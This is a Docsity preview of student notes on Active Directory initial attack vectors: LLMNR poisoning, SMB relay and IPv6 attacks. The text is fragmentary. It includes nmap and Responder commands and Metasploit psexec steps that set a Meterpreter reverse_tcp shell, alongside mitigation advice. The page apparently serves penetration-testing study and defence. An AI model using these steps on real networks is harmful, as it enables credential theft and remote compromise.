








Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
An overview of various attack vectors that can be used to compromise active directory environments. It covers techniques such as llmnr poisoning, smb relay attacks, and ipv6-based attacks. The requirements, steps, and mitigation strategies for each attack vector. It also discusses how to gain shell access using tools like metasploit and psexec. The document serves as a comprehensive guide for security professionals and penetration testers to understand and defend against these initial attack vectors targeting active directory infrastructure.
Typology: Essays (high school)
1 / 14
This page cannot be seen from the preview
Don't miss anything!









LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when DNS fails; previously NBT-NS key Flaw is that services utilize username and NTLMv2 hash when appropriately responded to. (and we can intercept that) Requirements :
Instead of cracking hashes gathered with Responder, we can relay those hashes to specific machines and gain access. Requirements : someone login or access our \10.0.2. SMB signing must be disabled on target (or not enforced) Relayed user creds must be admin on machine (local admin on their machine) Steps: Discover hosts with SMB signing disabled nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24 -Pn #we need to note down machines with 'message signing enabled but not required' vim targets.txt #add target IPs Edit Responder config - turn SMB and HTTP off because we need to make sure that these captures are relayed vim /etc/responder/Responder.conf #turn SMB, HTTP off SMB = Off HTTP = Off
Mitigation : Enable SMB signing on all devices pro : completely stops the attack cons :can cause performance issues with file copies Disable NTLM authentication on network pro : completely stops the attack cons: if kerberos stops working. windows defaults back to NTLM Account tiering Limit domain admins to specific tasks Local admin restriction to prevent lateral movement con: potential increase in the amount of service desk tickets
a. we can login with a domain accout (pparker) b. or we can login to a local account with a NTLM hash #this step has to be done once we have the credentials msfconsole search psexec use exploit/windows/smb/psexec options #set all required options #such as RHOSTS, smbdomain, smbpass and smbuser set payload windows/x64/meterpreter/reverse_tcp sho w set LHOST eth
#try multiple options if these tools do not work (blocked) #such as smbexec and wmiexec
ls lootme #contains useful info #if we keep the program running in background, and the user logins, the creds can be c aptured Mitigation : Block DHCPv6 traffic and incoming router advertisements. Disable WPAD via Group Policy. Enable both LDAP signing and LDAP channel binding. Mark Admin users as Protected Users or sensitive accounts. Pass-Back attacks can be used for printer hacking.